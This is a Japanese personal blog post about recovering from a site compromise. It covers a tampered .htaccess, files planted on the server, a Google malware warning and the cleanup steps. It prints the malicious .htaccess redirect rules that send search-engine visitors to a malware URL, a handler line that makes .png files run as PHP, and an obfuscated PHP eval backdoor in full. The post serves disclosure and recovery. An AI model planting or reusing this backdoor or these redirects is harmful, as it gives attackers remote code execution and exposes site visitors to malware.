.htaccessを改ざんされ「マルウェアサイトの疑いがあります」と出てしまった場合の対処法

僕が運営しているサイトにアクセスしたらなんだか怪しい警告が出てしまいました・・・。

警告画面

どうやら、マルウェア(不正かつ有害な動作を行う意図で作成された悪意のあるソフトウェアや悪質なコードの総称)にやられてしまったようです・・・。個人サイトなのに・・・。

「警告を無視」ボタンをクリックすれば表示することはできるのですが、まるでスパムサイトのような扱いで嫌ですね〜。

これ、大企業のビジネスサイトなら大損害ですね。

というわけで、こうなってしまった原因究明が始まります。


ちなみに、このサイトだけでなく同じサーバーを使っていた別のサイトもいくつかやられていました・・・。

googleウェブマスターツールに登録

検索エンジンはグーグルなので、こういった場合はまずgoogleウェブマスターツールに登録します。

すると、すぐに以下のようなアラートが出ます。

googleウェブマスターツール

「サイトの状態に重要な問題が発見されました。」とあるので、「サイトの状態を確認する」をクリックします。

120702_3.jpg

「致命的なマルウェアが検出されました。」とあります。なんか、すごく不気味ですね〜。「致命的」って・・・。

というわけで、「不正なソフトウェアが検出されたどうかをチェック」をクリックします。

120702_4.jpg

「一般的な問題」に次にようなアドバイスがあります。

このサイトの一部のURLは、マルウェアをインストールするwebページにブラウザをリダイレクトします。このサイトのページをホスティングするサーバーの設定ファイル(Apacheの.htaccessファイルなど)が改ざんされている可能性があります。

僕はこの文章を読んですぐに、「なに〜!!.htaccessファイルが改ざん!?」と思いました。

まさか、自分のサイトが改ざんされるなんて思ってもいなかったからです。サイトの改ざんなんて他人事のように思っていました。

でも、とうとう自分も被害者に・・・。

こんな時は焦っても何もいいことありません。まずやるべきこと・・・それは冷静になることです。

.htaccessファイルをチェック

そして、FTPで「.htaccessファイル」をチェックします。

すると、以下のような内容が書かれていました。


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://senetrpals.ru/olafz?11 [R=301,L]
</IfModule>
AddHandler php5.3-script .php
ErrorDocument 400 http://senetrpals.ru/olafz?11
ErrorDocument 401 http://senetrpals.ru/olafz?11
ErrorDocument 403 http://senetrpals.ru/olafz?11
ErrorDocument 404 http://senetrpals.ru/olafz?11
ErrorDocument 500 http://senetrpals.ru/olafz?11

どうやら、「http://senetrpals.ru/olafz?11」というURLにリダイレクトされていたようです。。

知らなかった・・・。

しかも、パーミッションが「444」と誰でも書き込めるようになっています。。

パーミッションも変更されちゃったんですね。。

その他に、改ざんされたこと

色々と調べていくうちに、知らぬ間に色々と改ざんされていたことが分かります。

ここで、改ざんされたことをまとめたいと思います。

(1).htaccessファイルを改ざん

リダイレクトするように内容を書き換えられてしまった。

パーミッションも「444」に変更されてしまった。

(2)pagenews.phpという見知らぬファイルの生成

pagenews.phpといういかにもありそうなファイル名ですが、僕はこんなファイル名を使った覚えがありません。

開いてみると、たくさんのプログラムが書かれていました。

パーミッションも「755」と第三者が書き込みできるようになっていました。

(3)mt19122817n.phpという見知らぬファイルの生成

mtの後の番号は色々あるんですが、こんな感じのファイル名がいくつか生成されていました。

このファイルにも色々とプログラミングが書かれています。

(4)「.c5676.png」という見知らぬ画像ファイルの生成

僕はheteml(ヘテムル)というマルチドメインのサーバーを使って複数のサイトを運用しています。

FTPを開くと運用しているサイトがアルファベット順で表示されますが、最初のサイト(アルファベットの「a」で始まるサイト)のディレクトリの中に「.c5676.png」という名の見知らぬ画像ファイルの生成されていました。

これはこのサイトのルートではなく、ディレクトリの中に何気ない顔して存在していました。

(5).htaccessファイルが生成され「AddHandler application/x-httpd-php .png」と記述

(4)と同じディレクトリに作った覚えのない.htaccessファイルが生成されていました。

このファイルには「AddHandler application/x-httpd-php .png」と記述されていたので、この.htaccessファイルが(4)の「.c5676.png」を作ったと思われます。

(6)ルートのphpファイルの頭に、見知らぬタグが入れられている

サイトのルート(一番上の階層)にあるphpファイルの先頭で以下のようなタグが入れられていました。


<?php if(isset($_GET[w8408t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);
}

改ざんされたことは現状では以上の6つです。

まだ気づいていないだけで、やられている可能性はありますが・・・。

対処したこと

では次に、上記の「改ざんされたこと」に対する「対処したこと」をまとめます。

(1).htaccessの記述をすべて消去し、何も書かれていない状態でアップロード。
パーミッションを「444」から「604」に変更。

(2)見知らぬファイル「pagenews.php」や「mt19122817n.php」や「.c5676.png」などを消去。「AddHandler application/x-httpd-php .png」と書かれた「.htaccess」ファイルも消去。

(3)改ざんされた各サイトのルートのphpファイルを修正。

(4)FTPのパスワードを変更。これをやらないとまたやられる可能性があります。

(5)ワードプレスで作ったサイトの「wp-config.php」のパーミッションを「604」から「404」に変更。(ヘテムルの場合)

googleウェブマスターツールで審査をリクエスト

各ファイルの消去や修正が終わったら、またgoogleウェブマスターツールに戻ります。

120702_4.jpg

先ほどのこのページで「審査をリクエスト」をクリックします。

120702_5.jpg

チェックボックスにチェックを入れて、「OK」ボタンをクリックします。

僕はオプションに以下のように書きました。

「.htaccess」が改ざんされ、http://senetrpals.ru/olafz?11というURLにリダイレクトされていましたが、現在は修正し、パーミッションも「604」にして第三者が改ざんできなようにしています。

昨日の夜に審査をリクエストしたのですが、今日の9時には正常に表示されていました。

Googleの対応は早いですね〜。

※追伸(7月2日)

heteml(ヘテムル)にファイルが改ざんされたことを問い合わせから報告したのですが、報告した翌日に「改ざんされたファイルのリスト」を作ってくれました。

自分で気づかなかったファイルがかなりありましたね^^;

気をつけるべきことは「不正な記述があるもの」と「ファイル自体が不正に設置されているもの」の2種類があることですね。

「不正な記述があるもの」は修正し、「ファイル自体が不正に設置されているもの」は削除し、すべて対処が終了しました。

これでひとまず安心です。

今回学んだことは、WordpressやMovable TypeなどのCMSを使っている場合は、常に最新版にアップデートすることですね。

古いバージョンは狙われやすいので。